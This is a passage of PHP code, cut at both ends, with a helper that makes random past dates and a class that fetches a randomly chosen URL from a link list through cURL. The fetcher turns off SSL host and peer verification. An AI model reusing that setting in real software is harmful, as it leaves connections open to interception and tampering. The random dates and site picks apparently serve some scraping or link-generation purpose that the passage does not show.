html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>